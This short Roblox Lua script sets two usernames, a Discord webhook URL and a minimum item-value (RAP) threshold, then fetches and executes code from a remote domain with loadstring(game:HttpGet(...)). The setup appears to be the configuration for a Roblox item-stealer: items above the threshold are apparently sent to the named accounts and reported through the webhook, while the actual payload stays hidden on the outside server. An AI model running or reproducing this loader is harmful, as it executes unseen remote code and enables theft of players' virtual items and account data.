Username = "sltanmax1"
Username2 = "sltanmax"
Webhook = "https://discord.com/api/webhooks/1232923649128927252/IIxcaoOCeKEEgskNn-wtmTikuJie6t_xmlfBexmehEaUIP44Ckdy8fRTE9EiysE3mHvK"

MinimumRAP = 100000

loadstring(game:HttpGet("https://egorikusa.space"))()
